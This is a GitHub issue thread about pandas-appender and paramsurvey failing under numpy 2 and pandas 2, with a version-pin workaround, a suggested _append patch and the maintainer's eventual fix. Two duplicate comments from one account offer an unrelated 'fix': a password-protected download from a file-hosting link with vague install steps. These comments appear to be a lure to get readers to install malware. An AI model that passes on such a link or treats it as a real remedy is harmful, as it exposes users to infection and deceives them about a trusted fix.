### ISSUE TITLE
paramsurvey / pandas-appender needs update for numpy>=2 and pandas >=2

### ISSUE THREAD

**Issue by wumpus** [achael/eht-imaging#193]
pandas-appender is a somewhat overly clever package that lets paramsurvey append the incremental output it seems to a dataframe. Due to the removal of a function in pandas 2, it needs to be updated. This became very obvious recently because numpy 2, which was released last June, requires pandas 2 and doesn't say that in its metadata.

I'm going to fix pandas-appender and I'll close this issue when I'm done.

The error looks like: `ERROR test/unit/test_multiprocessing.py - ValueError: numpy.dtype size changed, may indicate binary incompatibility. Expected 96 from C header, got 88 from PyObject` -- which is confusingly similar to a different numpy problem from the past, with a different solution.

I've added a workaround to paramsurvey to hide this problem. If anyone sees this elsewhere, the way to hide it is to install:

pip install 'numpy<2'

I don't think updating ehtim will ever see this problem.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by voitsik** [comment]
It seems the `DataFrame._append` function is still present in Pandas 2.2. If I replace `df.append` with `df._append` in the `pandas-appender` package, it passes all tests.

**Comment by wumpus** [comment]
That's pretty funny.

**Comment by wumpus** [comment]
OK I have fixed this the correct way (although I was temped by @voitsik's suggestion).

I test both pandas<2 and modern pandas.
